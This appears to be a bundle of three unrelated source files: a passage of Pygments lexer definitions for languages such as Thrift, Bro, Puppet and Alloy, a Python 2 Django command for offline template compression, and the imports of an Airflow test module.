(r'(\-?(inf|nan))\b', Number.Float),
(r'0x[0-9a-fA-F]+[LlUu]*', Number.Hex),
(r'0[0-7]+[LlUu]*', Number.Oct),
(r'\d+[LlUu]*', Number.Integer),
(r'[+-=]', Operator),
(r'([a-zA-Z_][\w.]*)([ \t]*)(=)',
bygroups(Name.Attribute, Text, Operator)),
('[a-zA-Z_][\w.]*', Name),
],
'package': [
(r'[a-zA-Z_]\w*', Name.Namespace, '#pop'),
default('#pop'),
],
'message': [
(r'[a-zA-Z_]\w*', Name.Class, '#pop'),
default('#pop'),
],
'type': [
(r'[a-zA-Z_]\w*', Name, '#pop'),
default('#pop'),
],
}
class ThriftLexer(RegexLexer):
"""
For `Thrift <https://thrift.apache.org/>`__ interface definitions.
.. versionadded:: 2.1
"""
name = 'Thrift'
aliases = ['thrift']
filenames = ['*.thrift']
mimetypes = ['application/x-thrift']
tokens = {
'root': [
include('whitespace'),
include('comments'),
(r'"', String.Double, combined('stringescape', 'dqs')),
(r'\'', String.Single, combined('stringescape', 'sqs')),
(r'(namespace)(\s+)',
bygroups(Keyword.Namespace, Text.Whitespace), 'namespace'),
(r'(enum|union|struct|service|exception)(\s+)',
bygroups(Keyword.Declaration, Text.Whitespace), 'class'),
(r'((?:(?:[^\W\d]|\$)[\w.\[\]$<>]*\s+)+?)' # return arguments
r'((?:[^\W\d]|\$)[\w$]*)' # method name
r'(\s*)(\()', # signature start
bygroups(using(this), Name.Function, Text, Operator)),
include('keywords'),
include('numbers'),
(r'[&=]', Operator),
(r'[:;\,\{\}\(\)\<>\[\]]', Punctuation),
(r'[a-zA-Z_](\.[a-zA-Z_0-9]|[a-zA-Z_0-9])*', Name),
],
'whitespace': [
(r'\n', Text.Whitespace),
(r'\s+', Text.Whitespace),
],
'comments': [
(r'#.*$', Comment),
(r'//.*?\n', Comment),
(r'/\*[\w\W]*?\*/', Comment.Multiline),
],
'stringescape': [
(r'\\([\\nrt"\'])', String.Escape),
],
'dqs': [
(r'"', String.Double, '#pop'),
(r'[^\\"\n]+', String.Double),
],
'sqs': [
(r"'", String.Single, '#pop'),
(r'[^\\\'\n]+', String.Single),
],
'namespace': [
(r'[a-z\*](\.[a-zA-Z_0-9]|[a-zA-Z_0-9])*', Name.Namespace, '#pop'),
default('#pop'),
],
'class': [
(r'[a-zA-Z_]\w*', Name.Class, '#pop'),
default('#pop'),
],
'keywords': [
(r'(async|oneway|extends|throws|required|optional)\b', Keyword),
(r'(true|false)\b', Keyword.Constant),
(r'(const|typedef)\b', Keyword.Declaration),
(words((
'cpp_namespace', 'cpp_include', 'cpp_type', 'java_package',
'cocoa_prefix', 'csharp_namespace', 'delphi_namespace',
'php_namespace', 'py_module', 'perl_package',
'ruby_namespace', 'smalltalk_category', 'smalltalk_prefix',
'xsd_all', 'xsd_optional', 'xsd_nillable', 'xsd_namespace',
'xsd_attrs', 'include'), suffix=r'\b'),
Keyword.Namespace),
(words((
'void', 'bool', 'byte', 'i16', 'i32', 'i64', 'double',
'string', 'binary', 'void', 'map', 'list', 'set', 'slist',
'senum'), suffix=r'\b'),
Keyword.Type),
(words((
'BEGIN', 'END', '__CLASS__', '__DIR__', '__FILE__',
'__FUNCTION__', '__LINE__', '__METHOD__', '__NAMESPACE__',
'abstract', 'alias', 'and', 'args', 'as', 'assert', 'begin',
'break', 'case', 'catch', 'class', 'clone', 'continue',
'declare', 'def', 'default', 'del', 'delete', 'do', 'dynamic',
'elif', 'else', 'elseif', 'elsif', 'end', 'enddeclare',
'endfor', 'endforeach', 'endif', 'endswitch', 'endwhile',
'ensure', 'except', 'exec', 'finally', 'float', 'for',
'foreach', 'function', 'global', 'goto', 'if', 'implements',
'import', 'in', 'inline', 'instanceof', 'interface', 'is',
'lambda', 'module', 'native', 'new', 'next', 'nil', 'not',
'or', 'pass', 'public', 'print', 'private', 'protected',
'raise', 'redo', 'rescue', 'retry', 'register', 'return',
'self', 'sizeof', 'static', 'super', 'switch', 'synchronized',
'then', 'this', 'throw', 'transient', 'try', 'undef',
'unless', 'unsigned', 'until', 'use', 'var', 'virtual',
'volatile', 'when', 'while', 'with', 'xor', 'yield'),
prefix=r'\b', suffix=r'\b'),
Keyword.Reserved),
],
'numbers': [
(r'[+-]?(\d+\.\d+([eE][+-]?\d+)?|\.?\d+[eE][+-]?\d+)', Number.Float),
(r'[+-]?0x[0-9A-Fa-f]+', Number.Hex),
(r'[+-]?[0-9]+', Number.Integer),
],
}
class BroLexer(RegexLexer):
"""
For `Bro <http://bro-ids.org/>`_ scripts.
.. versionadded:: 1.5
"""
name = 'Bro'
aliases = ['bro']
filenames = ['*.bro']
_hex = r'[0-9a-fA-F_]'
_float = r'((\d*\.?\d+)|(\d+\.?\d*))([eE][-+]?\d+)?'
_h = r'[A-Za-z0-9][-A-Za-z0-9]*'
tokens = {
'root': [
# Whitespace
(r'^@.*?\n', Comment.Preproc),
(r'#.*?\n', Comment.Single),
(r'\n', Text),
(r'\s+', Text),
(r'\\\n', Text),
# Keywords
(r'(add|alarm|break|case|const|continue|delete|do|else|enum|event'
r'|export|for|function|if|global|hook|local|module|next'
r'|of|print|redef|return|schedule|switch|type|when|while)\b', Keyword),
(r'(addr|any|bool|count|counter|double|file|int|interval|net'
r'|pattern|port|record|set|string|subnet|table|time|timer'
r'|vector)\b', Keyword.Type),
(r'(T|F)\b', Keyword.Constant),
(r'(&)((?:add|delete|expire)_func|attr|(?:create|read|write)_expire'
r'|default|disable_print_hook|raw_output|encrypt|group|log'
r'|mergeable|optional|persistent|priority|redef'
r'|rotate_(?:interval|size)|synchronized)\b',
bygroups(Punctuation, Keyword)),
(r'\s+module\b', Keyword.Namespace),
# Addresses, ports and networks
(r'\d+/(tcp|udp|icmp|unknown)\b', Number),
(r'(\d+\.){3}\d+', Number),
(r'(' + _hex + r'){7}' + _hex, Number),
(r'0x' + _hex + r'(' + _hex + r'|:)*::(' + _hex + r'|:)*', Number),
(r'((\d+|:)(' + _hex + r'|:)*)?::(' + _hex + r'|:)*', Number),
(r'(\d+\.\d+\.|(\d+\.){2}\d+)', Number),
# Hostnames
(_h + r'(\.' + _h + r')+', String),
# Numeric
(_float + r'\s+(day|hr|min|sec|msec|usec)s?\b', Literal.Date),
(r'0[xX]' + _hex, Number.Hex),
(_float, Number.Float),
(r'\d+', Number.Integer),
(r'/', String.Regex, 'regex'),
(r'"', String, 'string'),
# Operators
(r'[!%*/+:<=>?~|-]', Operator),
(r'([-+=&|]{2}|[+=!><-]=)', Operator),
(r'(in|match)\b', Operator.Word),
(r'[{}()\[\]$.,;]', Punctuation),
# Identfier
(r'([_a-zA-Z]\w*)(::)', bygroups(Name, Name.Namespace)),
(r'[a-zA-Z_]\w*', Name)
],
'string': [
(r'"', String, '#pop'),
(r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape),
(r'[^\\"\n]+', String),
(r'\\\n', String),
(r'\\', String)
],
'regex': [
(r'/', String.Regex, '#pop'),
(r'\\[\\nt/]', String.Regex), # String.Escape is too intense here.
(r'[^\\/\n]+', String.Regex),
(r'\\\n', String.Regex),
(r'\\', String.Regex)
]
}
class PuppetLexer(RegexLexer):
"""
For `Puppet <http://puppetlabs.com/>`__ configuration DSL.
.. versionadded:: 1.6
"""
name = 'Puppet'
aliases = ['puppet']
filenames = ['*.pp']
tokens = {
'root': [
include('comments'),
include('keywords'),
include('names'),
include('numbers'),
include('operators'),
include('strings'),
(r'[]{}:(),;[]', Punctuation),
(r'[^\S\n]+', Text),
],
'comments': [
(r'\s*#.*$', Comment),
(r'/(\\\n)?[*](.|\n)*?[*](\\\n)?/', Comment.Multiline),
],
'operators': [
(r'(=>|\?|<|>|=|\+|-|/|\*|~|!|\|)', Operator),
(r'(in|and|or|not)\b', Operator.Word),
],
'names': [
('[a-zA-Z_]\w*', Name.Attribute),
(r'(\$\S+)(\[)(\S+)(\])', bygroups(Name.Variable, Punctuation,
String, Punctuation)),
(r'\$\S+', Name.Variable),
],
'numbers': [
# Copypasta from the Python lexer
(r'(\d+\.\d*|\d*\.\d+)([eE][+-]?[0-9]+)?j?', Number.Float),
(r'\d+[eE][+-]?[0-9]+j?', Number.Float),
(r'0[0-7]+j?', Number.Oct),
(r'0[xX][a-fA-F0-9]+', Number.Hex),
(r'\d+L', Number.Integer.Long),
(r'\d+j?', Number.Integer)
],
'keywords': [
# Left out 'group' and 'require'
# Since they're often used as attributes
(words((
'absent', 'alert', 'alias', 'audit', 'augeas', 'before', 'case',
'check', 'class', 'computer', 'configured', 'contained',
'create_resources', 'crit', 'cron', 'debug', 'default',
'define', 'defined', 'directory', 'else', 'elsif', 'emerg',
'err', 'exec', 'extlookup', 'fail', 'false', 'file',
'filebucket', 'fqdn_rand', 'generate', 'host', 'if', 'import',
'include', 'info', 'inherits', 'inline_template', 'installed',
'interface', 'k5login', 'latest', 'link', 'loglevel',
'macauthorization', 'mailalias', 'maillist', 'mcx', 'md5',
'mount', 'mounted', 'nagios_command', 'nagios_contact',
'nagios_contactgroup', 'nagios_host', 'nagios_hostdependency',
'nagios_hostescalation', 'nagios_hostextinfo', 'nagios_hostgroup',
'nagios_service', 'nagios_servicedependency', 'nagios_serviceescalation',
'nagios_serviceextinfo', 'nagios_servicegroup', 'nagios_timeperiod',
'node', 'noop', 'notice', 'notify', 'package', 'present', 'purged',
'realize', 'regsubst', 'resources', 'role', 'router', 'running',
'schedule', 'scheduled_task', 'search', 'selboolean', 'selmodule',
'service', 'sha1', 'shellquote', 'split', 'sprintf',
'ssh_authorized_key', 'sshkey', 'stage', 'stopped', 'subscribe',
'tag', 'tagged', 'template', 'tidy', 'true', 'undef', 'unmounted',
'user', 'versioncmp', 'vlan', 'warning', 'yumrepo', 'zfs', 'zone',
'zpool'), prefix='(?i)', suffix=r'\b'),
Keyword),
],
'strings': [
(r'"([^"])*"', String),
(r"'(\\'|[^'])*'", String),
],
}
class RslLexer(RegexLexer):
"""
`RSL <http://en.wikipedia.org/wiki/RAISE>`_ is the formal specification
language used in RAISE (Rigorous Approach to Industrial Software Engineering)
method.
.. versionadded:: 2.0
"""
name = 'RSL'
aliases = ['rsl']
filenames = ['*.rsl']
mimetypes = ['text/rsl']
flags = re.MULTILINE | re.DOTALL
tokens = {
'root': [
(words((
'Bool', 'Char', 'Int', 'Nat', 'Real', 'Text', 'Unit', 'abs',
'all', 'always', 'any', 'as', 'axiom', 'card', 'case', 'channel',
'chaos', 'class', 'devt_relation', 'dom', 'elems', 'else', 'elif',
'end', 'exists', 'extend', 'false', 'for', 'hd', 'hide', 'if',
'in', 'is', 'inds', 'initialise', 'int', 'inter', 'isin', 'len',
'let', 'local', 'ltl_assertion', 'object', 'of', 'out', 'post',
'pre', 'read', 'real', 'rng', 'scheme', 'skip', 'stop', 'swap',
'then', 'theory', 'test_case', 'tl', 'transition_system', 'true',
'type', 'union', 'until', 'use', 'value', 'variable', 'while',
'with', 'write', '~isin', '-inflist', '-infset', '-list',
'-set'), prefix=r'\b', suffix=r'\b'),
Keyword),
(r'(variable|value)\b', Keyword.Declaration),
(r'--.*?\n', Comment),
(r'<:.*?:>', Comment),
(r'\{!.*?!\}', Comment),
(r'/\*.*?\*/', Comment),
(r'^[ \t]*([\w]+)[ \t]*:[^:]', Name.Function),
(r'(^[ \t]*)([\w]+)([ \t]*\([\w\s,]*\)[ \t]*)(is|as)',
bygroups(Text, Name.Function, Text, Keyword)),
(r'\b[A-Z]\w*\b', Keyword.Type),
(r'(true|false)\b', Keyword.Constant),
(r'".*"', String),
(r'\'.\'', String.Char),
(r'(><|->|-m->|/\\|<=|<<=|<\.|\|\||\|\^\||-~->|-~m->|\\/|>=|>>|'
r'\.>|\+\+|-\\|<->|=>|:-|~=|\*\*|<<|>>=|\+>|!!|\|=\||#)',
Operator),
(r'[0-9]+\.[0-9]+([eE][0-9]+)?[fd]?', Number.Float),
(r'0x[0-9a-f]+', Number.Hex),
(r'[0-9]+', Number.Integer),
(r'.', Text),
],
}
def analyse_text(text):
"""
Check for the most common text in the beginning of a RSL file.
"""
if re.search(r'scheme\s*.*?=\s*class\s*type', text, re.I) is not None:
return 1.0
class MscgenLexer(RegexLexer):
"""
For `Mscgen <http://www.mcternan.me.uk/mscgen/>`_ files.
.. versionadded:: 1.6
"""
name = 'Mscgen'
aliases = ['mscgen', 'msc']
filenames = ['*.msc']
_var = r'(\w+|"(?:\\"|[^"])*")'
tokens = {
'root': [
(r'msc\b', Keyword.Type),
# Options
(r'(hscale|HSCALE|width|WIDTH|wordwraparcs|WORDWRAPARCS'
r'|arcgradient|ARCGRADIENT)\b', Name.Property),
# Operators
(r'(abox|ABOX|rbox|RBOX|box|BOX|note|NOTE)\b', Operator.Word),
(r'(\.|-|\|){3}', Keyword),
(r'(?:-|=|\.|:){2}'
r'|<<=>>|<->|<=>|<<>>|<:>'
r'|->|=>>|>>|=>|:>|-x|-X'
r'|<-|<<=|<<|<=|<:|x-|X-|=', Operator),
# Names
(r'\*', Name.Builtin),
(_var, Name.Variable),
# Other
(r'\[', Punctuation, 'attrs'),
(r'\{|\}|,|;', Punctuation),
include('comments')
],
'attrs': [
(r'\]', Punctuation, '#pop'),
(_var + r'(\s*)(=)(\s*)' + _var,
bygroups(Name.Attribute, Text.Whitespace, Operator, Text.Whitespace,
String)),
(r',', Punctuation),
include('comments')
],
'comments': [
(r'(?://|#).*?\n', Comment.Single),
(r'/\*(?:.|\n)*?\*/', Comment.Multiline),
(r'[ \t\r\n]+', Text.Whitespace)
]
}
class VGLLexer(RegexLexer):
"""
For `SampleManager VGL <http://www.thermoscientific.com/samplemanager>`_
source code.
.. versionadded:: 1.6
"""
name = 'VGL'
aliases = ['vgl']
filenames = ['*.rpf']
flags = re.MULTILINE | re.DOTALL | re.IGNORECASE
tokens = {
'root': [
(r'\{[^}]*\}', Comment.Multiline),
(r'declare', Keyword.Constant),
(r'(if|then|else|endif|while|do|endwhile|and|or|prompt|object'
r'|create|on|line|with|global|routine|value|endroutine|constant'
r'|global|set|join|library|compile_option|file|exists|create|copy'
r'|delete|enable|windows|name|notprotected)(?! *[=<>.,()])',
Keyword),
(r'(true|false|null|empty|error|locked)', Keyword.Constant),
(r'[~^*#!%&\[\]()<>|+=:;,./?-]', Operator),
(r'"[^"]*"', String),
(r'(\.)([a-z_$][\w$]*)', bygroups(Operator, Name.Attribute)),
(r'[0-9][0-9]*(\.[0-9]+(e[+\-]?[0-9]+)?)?', Number),
(r'[a-z_$][\w$]*', Name),
(r'[\r\n]+', Text),
(r'\s+', Text)
]
}
class AlloyLexer(RegexLexer):
"""
For `Alloy <http://alloy.mit.edu>`_ source code.
.. versionadded:: 2.0
"""
name = 'Alloy'
aliases = ['alloy']
filenames = ['*.als']
mimetypes = ['text/x-alloy']
flags = re.MULTILINE | re.DOTALL
iden_rex = r'[a-zA-Z_][\w\']*'
text_tuple = (r'[^\S\n]+', Text)
tokens = {
'sig': [
(r'(extends)\b', Keyword, '#pop'),
(iden_rex, Name),
text_tuple,
(r',', Punctuation),
(r'\{', Operator, '#pop'),
],
'module': [
text_tuple,
(iden_rex, Name, '#pop'),
],
'fun': [
text_tuple,
(r'\{', Operator, '#pop'),
(iden_rex, Name, '#pop'),
],
'root': [
(r'--.*?$', Comment.Single),
(r'//.*?$', Comment.Single),
(r'/\*.*?\*/', Comment.Multiline),
text_tuple,
(r'(module|open)(\s+)', bygroups(Keyword.Namespace, Text),
'module'),
(r'(sig|enum)(\s+)', bygroups(Keyword.Declaration, Text), 'sig'),
(r'(iden|univ|none)\b', Keyword.Constant),
(r'(int|Int)\b', Keyword.Type),
(r'(this|abstract|extends|set|seq|one|lone|let)\b', Keyword),
(r'(all|some|no|sum|disj|when|else)\b', Keyword),
(r'(run|check|for|but|exactly|expect|as)\b', Keyword),
(r'(and|or|implies|iff|in)\b', Operator.Word),
(r'(fun|pred|fact|assert)(\s+)', bygroups(Keyword, Text), 'fun'),
(r'!|#|&&|\+\+|<<|>>|>=|<=>|<=|\.|->', Operator),
(r'[-+/*%=<>&!^|~{}\[\]().]', Operator),
(iden_rex, Name),
(r'[:,]', Punctuation),
(r'[0-9]+', Number.Integer),
(r'"(\\\\|\\"|[^"])*"', String),
(r'\n', Text),
]
}
class PanLexer(RegexLexer):
"""
Lexer for `pan <http://github.com/quattor/pan/>`_ source files.
Based on tcsh lexer.
.. versionadded:: 2.0
"""
name = 'Pan'
aliases = ['pan']
filenames = ['*.pan']
tokens = {
'root': [
include('basic'),
(r'\(', Keyword, 'paren'),
(r'\{', Keyword, 'curly'),
include('data'),
],
'basic': [
(words((
'if', 'for', 'with', 'else', 'type', 'bind', 'while', 'valid', 'final',
'prefix', 'unique', 'object', 'foreach', 'include', 'template',
'function', 'variable', 'structure', 'extensible', 'declaration'),
prefix=r'\b', suffix=r'\s*\b'),
Keyword),
(words((
'file_contents', 'format', 'index', 'length', 'match', 'matches',
'replace', 'splice', 'split', 'substr', 'to_lowercase', 'to_uppercase',
'debug', 'error', 'traceback', 'deprecated', 'base64_decode',
'base64_encode', 'digest', 'escape', 'unescape', 'append', 'create',
'first', 'nlist', 'key', 'list', 'merge', 'next', 'prepend', 'is_boolean',
'is_defined', 'is_double', 'is_list', 'is_long', 'is_nlist', 'is_null',
'is_number', 'is_property', 'is_resource', 'is_string', 'to_boolean',
'to_double', 'to_long', 'to_string', 'clone', 'delete', 'exists',
'path_exists', 'if_exists', 'return', 'value'),
prefix=r'\b', suffix=r'\s*\b'),
Name.Builtin),
(r'#.*', Comment),
(r'\\[\w\W]', String.Escape),
(r'(\b\w+)(\s*)(=)', bygroups(Name.Variable, Text, Operator)),
(r'[\[\]{}()=]+', Operator),
(r'<<\s*(\'?)\\?(\w+)[\w\W]+?\2', String),
(r';', Punctuation),
],
'data': [
(r'(?s)"(\\\\|\\[0-7]+|\\.|[^"\\])*"', String.Double),
(r"(?s)'(\\\\|\\[0-7]+|\\.|[^'\\])*'", String.Single),
(r'\s+', Text),
(r'[^=\s\[\]{}()$"\'`\\;#]+', Text),
(r'\d+(?= |\Z)', Number),
],
'curly': [
(r'\}', Keyword, '#pop'),
(r':-', Keyword),
(r'\w+', Name.Variable),
(r'[^}:"\'`$]+', Punctuation),
(r':', Punctuation),
include('root'),
],
'paren': [
(r'\)', Keyword, '#pop'),
include('root'),
],
}
class CrmshLexer(RegexLexer):
"""
Lexer for `crmsh <http://crmsh.github.io/>`_ configuration files
for Pacemaker clusters.
.. versionadded:: 2.1
"""
name = 'Crmsh'
aliases = ['crmsh', 'pcmk']
filenames = ['*.crmsh', '*.pcmk']
mimetypes = []
elem = words((
'node', 'primitive', 'group', 'clone', 'ms', 'location',
'colocation', 'order', 'fencing_topology', 'rsc_ticket',
'rsc_template', 'property', 'rsc_defaults',
'op_defaults', 'acl_target', 'acl_group', 'user', 'role',
'tag'), suffix=r'(?![\w#$-])')
sub = words((
'params', 'meta', 'operations', 'op', 'rule',
'attributes', 'utilization'), suffix=r'(?![\w#$-])')
acl = words(('read', 'write', 'deny'), suffix=r'(?![\w#$-])')
bin_rel = words(('and', 'or'), suffix=r'(?![\w#$-])')
un_ops = words(('defined', 'not_defined'), suffix=r'(?![\w#$-])')
date_exp = words(('in_range', 'date', 'spec', 'in'), suffix=r'(?![\w#$-])')
acl_mod = (r'(?:tag|ref|reference|attribute|type|xpath)')
bin_ops = (r'(?:lt|gt|lte|gte|eq|ne)')
val_qual = (r'(?:string|version|number)')
rsc_role_action = (r'(?:Master|Started|Slave|Stopped|'
r'start|promote|demote|stop)')
tokens = {
'root': [
(r'^#.*\n?', Comment),
# attr=value (nvpair)
(r'([\w#$-]+)(=)("(?:""|[^"])*"|\S+)',
bygroups(Name.Attribute, Punctuation, String)),
# need this construct, otherwise numeric node ids
# are matched as scores
# elem id:
(r'(node)(\s+)([\w#$-]+)(:)',
bygroups(Keyword, Whitespace, Name, Punctuation)),
# scores
(r'([+-]?([0-9]+|inf)):', Number),
# keywords (elements and other)
(elem, Keyword),
(sub, Keyword),
(acl, Keyword),
# binary operators
(r'(?:%s:)?(%s)(?![\w#$-])' % (val_qual, bin_ops), Operator.Word),
# other operators
(bin_rel, Operator.Word),
(un_ops, Operator.Word),
(date_exp, Operator.Word),
# builtin attributes (e.g. #uname)
(r'#[a-z]+(?![\w#$-])', Name.Builtin),
# acl_mod:blah
(r'(%s)(:)("(?:""|[^"])*"|\S+)' % acl_mod,
bygroups(Keyword, Punctuation, Name)),
# rsc_id[:(role|action)]
# NB: this matches all other identifiers
(r'([\w#$-]+)(?:(:)(%s))?(?![\w#$-])' % rsc_role_action,
bygroups(Name, Punctuation, Operator.Word)),
# punctuation
(r'(\\(?=\n)|[[\](){}/:@])', Punctuation),
(r'\s+|\n', Whitespace),
],
}
|
|
import os
import sys
from types import MethodType
from fnmatch import fnmatch
from optparse import make_option
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
from django.core.management.base import NoArgsCommand, CommandError
from django.template import Context, Template, TemplateDoesNotExist, TemplateSyntaxError
from django.utils.datastructures import SortedDict
from django.utils.importlib import import_module
from django.utils.html import strip_spaces_between_tags
from django.template.loader import get_template
from django.template.loader_tags import ExtendsNode, BlockNode, BLOCK_CONTEXT_KEY
import jinja2
import jinja2.nodes
import jinja2.exceptions
from canvas.templatetags.jinja_base import env as jinja_env
try:
from django.template.loaders.cached import Loader as CachedLoader
except ImportError:
CachedLoader = None
from compressor.cache import (get_offline_hexdigest, write_offline_manifest, get_hexdigest,
get_offline_jinja_hexdigest)
from compressor.conf import settings
from compressor.exceptions import OfflineGenerationError
from compressor.templatetags.compress import CompressorNode
from compressor.utils import walk, any
def patched_get_parent(self, context):
# Patch template returned by get_parent to make sure their _render method is
# just returning the context instead of actually rendering stuff.
compiled_template = self._old_get_parent(context)
compiled_template._render = MethodType(lambda self, c: c, compiled_template)
return compiled_template
def render_jinja_node(node, context, env):
template_node = jinja2.nodes.Template([node])
code = env.compile(template_node)
template = jinja2.environment.Template.from_code(env, code, context)
return template.render()
class Command(NoArgsCommand):
help = "Compress content outside of the request/response cycle"
option_list = NoArgsCommand.option_list + (
make_option('--extension', '-e', action='append', dest='extensions',
help='The file extension(s) to examine (default: ".html", '
'separate multiple extensions with commas, or use -e '
'multiple times)'),
make_option('-f', '--force', default=False, action='store_true',
help="Force the generation of compressed content even if the "
"COMPRESS_ENABLED setting is not True.", dest='force'),
make_option('--follow-links', default=False, action='store_true',
help="Follow symlinks when traversing the COMPRESS_ROOT "
"(which defaults to MEDIA_ROOT). Be aware that using this "
"can lead to infinite recursion if a link points to a parent "
"directory of itself.", dest='follow_links'),
)
requires_model_validation = False
def get_loaders(self):
from django.template.loader import template_source_loaders
if template_source_loaders is None:
try:
from django.template.loader import (
find_template as finder_func)
except ImportError:
from django.template.loader import (
find_template_source as finder_func)
try:
source, name = finder_func('test')
except TemplateDoesNotExist:
pass
from django.template.loader import template_source_loaders
loaders = []
# If template loader is CachedTemplateLoader, return the loaders
# that it wraps around. So if we have
# TEMPLATE_LOADERS = (
# ('django.template.loaders.cached.Loader', (
# 'django.template.loaders.filesystem.Loader',
# 'django.template.loaders.app_directories.Loader',
# )),
# )
# The loaders will return django.template.loaders.filesystem.Loader
# and django.template.loaders.app_directories.Loader
for loader in template_source_loaders:
if CachedLoader is not None and isinstance(loader, CachedLoader):
loaders.extend(loader.loaders)
else:
loaders.append(loader)
return loaders
def compress(self, log=None, **options):
"""
Searches templates containing 'compress' nodes and compresses them
"offline" -- outside of the request/response cycle.
The result is cached with a cache-key derived from the content of the
compress nodes (not the content of the possibly linked files!).
"""
extensions = options.get('extensions')
extensions = self.handle_extensions(extensions or ['html'])
verbosity = int(options.get("verbosity", 0))
if not log:
log = StringIO()
if not settings.TEMPLATE_LOADERS:
raise OfflineGenerationError("No template loaders defined. You "
"must set TEMPLATE_LOADERS in your "
"settings.")
paths = set()
for loader in self.get_loaders():
try:
module = import_module(loader.__module__)
get_template_sources = getattr(module,
'get_template_sources', None)
if get_template_sources is None:
get_template_sources = loader.get_template_sources
paths.update(list(get_template_sources('')))
except (ImportError, AttributeError):
# Yeah, this didn't work out so well, let's move on
pass
if not paths:
raise OfflineGenerationError("No template paths found. None of "
"the configured template loaders "
"provided template paths. See "
"http://django.me/template-loaders "
"for more information on template "
"loaders.")
if verbosity > 1:
log.write("Considering paths:\n\t" + "\n\t".join(paths) + "\n")
templates = set()
for path in paths:
for root, dirs, files in walk(path,
followlinks=options.get('followlinks', False)):
templates.update(os.path.join(root, name)
for name in files if not name.startswith('.') and
any(fnmatch(name, "*%s" % glob) for glob in extensions))
if not templates:
raise OfflineGenerationError("No templates found. Make sure your "
"TEMPLATE_LOADERS and TEMPLATE_DIRS "
"settings are correct.")
if verbosity > 1:
log.write("Found templates:\n\t" + "\n\t".join(templates) + "\n")
compressor_nodes = SortedDict()
for template_name in templates:
try:
template_file = open(template_name)
try:
template = Template(template_file.read().decode(
settings.FILE_CHARSET))
finally:
template_file.close()
except IOError: # unreadable file -> ignore
if verbosity > 0:
log.write("Unreadable template at: %s\n" % template_name)
continue
except TemplateSyntaxError: # broken template -> try jinja -> ignore if still broken
try:
template_file = open(template_name)
template = jinja_env.parse(template_file.read().decode(settings.FILE_CHARSET))
template.is_jinja = True
template.name = template_name
except jinja2.exceptions.TemplateSyntaxError:
if verbosity > 0:
log.write("Invalid template at: %s\n" % template_name)
continue
finally:
template_file.close()
except UnicodeDecodeError:
if verbosity > 0:
log.write("UnicodeDecodeError while trying to read "
"template %s\n" % template_name)
if getattr(template, 'is_jinja', False):
nodes = template.find_all(jinja2.nodes.CallBlock)
for node in nodes:
try:
compress_node = node.call.node
if (compress_node.identifier == 'compressor.contrib.jinja2ext.CompressorExtension'
and compress_node.name == '_compress'):
template.template_name = template_name
compressor_nodes.setdefault(template, []).append(node)
except AttributeError, IndexError:
pass
else:
nodes = list(self.walk_nodes(template))
if nodes:
template.template_name = template_name
compressor_nodes.setdefault(template, []).extend(nodes)
if not compressor_nodes:
raise OfflineGenerationError(
"No 'compress' template tags found in templates.")
if verbosity > 0:
log.write("Found 'compress' tags in:\n\t" +
"\n\t".join((t.template_name for t in compressor_nodes.keys())) + "\n")
log.write("Compressing... ")
count = 0
results = []
offline_manifest = {}
for template, nodes in compressor_nodes.iteritems():
if getattr(template, 'is_jinja', False):
for node in nodes:
context = settings.COMPRESS_OFFLINE_CONTEXT.copy()
old_forced = getattr(jinja_env, '_django_compressor_offline_forced', None)
jinja_env._django_compressor_offline_forced = True
nodelist = node.body
key = get_offline_jinja_hexdigest(nodelist)
result = render_jinja_node(node, context, jinja_env)
if old_forced is not None:
jinja_env._django_compressor_offline_forced = old_forced
offline_manifest[key] = result
results.append(result)
count += 1
continue
context = Context(settings.COMPRESS_OFFLINE_CONTEXT)
extra_context = {}
firstnode = template.nodelist[0]
if isinstance(firstnode, ExtendsNode):
# If this template has a ExtendsNode, we apply our patch to
# generate the necessary context, and then use it for all the
# nodes in it, just in case (we don't know which nodes were
# in a block)
firstnode._old_get_parent = firstnode.get_parent
firstnode.get_parent = MethodType(patched_get_parent, firstnode)
extra_context = firstnode.render(context)
context.render_context = extra_context.render_context
for node in nodes:
context.push()
if extra_context and node._block_name:
context['block'] = context.render_context[BLOCK_CONTEXT_KEY].pop(node._block_name)
if context['block']:
context['block'].context = context
key = get_offline_hexdigest(node.nodelist)
result = node.render(context, forced=True)
offline_manifest[key] = result
context.pop()
results.append(result)
count += 1
write_offline_manifest(offline_manifest)
log.write("done\nCompressed %d block(s) from %d template(s).\n" %
(count, len(compressor_nodes)))
return count, results
def walk_nodes(self, node, block_name=None):
for node in getattr(node, "nodelist", []):
if isinstance(node, BlockNode):
block_name = node.name
if isinstance(node, CompressorNode):
node._block_name = block_name
yield node
else:
for node in self.walk_nodes(node, block_name=block_name):
yield node
def handle_extensions(self, extensions=('html',)):
"""
organizes multiple extensions that are separated with commas or
passed by using --extension/-e multiple times.
for example: running 'django-admin compress -e js,txt -e xhtml -a'
would result in a extension list: ['.js', '.txt', '.xhtml']
>>> handle_extensions(['.html', 'html,js,py,py,py,.py', 'py,.py'])
['.html', '.js']
>>> handle_extensions(['.html, txt,.tpl'])
['.html', '.tpl', '.txt']
"""
ext_list = []
for ext in extensions:
ext_list.extend(ext.replace(' ', '').split(','))
for i, ext in enumerate(ext_list):
if not ext.startswith('.'):
ext_list[i] = '.%s' % ext_list[i]
return set(ext_list)
def handle_noargs(self, **options):
if not settings.COMPRESS_ENABLED and not options.get("force"):
raise CommandError(
"Compressor is disabled. Set the COMPRESS_ENABLED "
"settting or use --force to override.")
if not settings.COMPRESS_OFFLINE:
if not options.get("force"):
raise CommandError(
"Offline compressiong is disabled. Set "
"COMPRESS_OFFLINE or use the --force to override.")
self.compress(sys.stdout, **options)
|
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import os
import unittest
import time
from airflow import models, settings, AirflowException
from airflow.exceptions import AirflowSkipException
from airflow.models import DAG, TaskInstance as TI
from airflow.models import State as ST
from airflow.models import DagModel
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.python_operator import PythonOperator
from airflow.ti_deps.deps.trigger_rule_dep import TriggerRuleDep
from airflow.utils.state import State
from mock import patch
